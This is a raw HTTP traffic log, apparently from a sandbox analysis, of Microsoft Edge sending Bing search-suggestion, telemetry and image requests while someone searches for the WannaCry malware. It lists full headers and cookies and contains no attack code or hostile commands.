useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-g4Vl8bLgY91lTjrClyy5CTNdrBRjHEXX5ZPRcA30hlc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:14 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199054.1491cf19
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1305
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199055.1491d189
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacr&cp=7&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacr&cp=7&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 734
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcf3aab4c058d382055a958d326
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-YmGsPTFXZeUALlAFM6ylwJiV54e41Cvy7E2G0aw//yc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:15 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199055.1491d1ba
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry&cp=8&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry&cp=8&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 26458
date: Thu, 17 Oct 2024 21:04:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199055.1491d27e
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A24%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A1%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199053944%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22AsResponseLength%22%3A%22733%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%2Cig%3AB131CF12E4AC449E81FA43FBEF327938%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A25%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054140%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054162%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22AsResponseLength%22%3A%22728%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054236%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%2Cig%3AC4590B6108BF47FE86E6B63DA7CD3064%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054237%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A24%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A1%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053924%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199053944%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%22%2C%22AsResponseLength%22%3A%22733%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacr%2Ci%3A23%2Cig%3AB131CF12E4AC449E81FA43FBEF327938%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A25%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054140%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054162%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%22%2C%22AsResponseLength%22%3A%22728%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054236%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%2Ci%3A24%2Cig%3AC4590B6108BF47FE86E6B63DA7CD3064%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054237%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199055.1491d8bf
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry%20&cp=9&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannacry%20&cp=9&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e253
GET

https://www.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
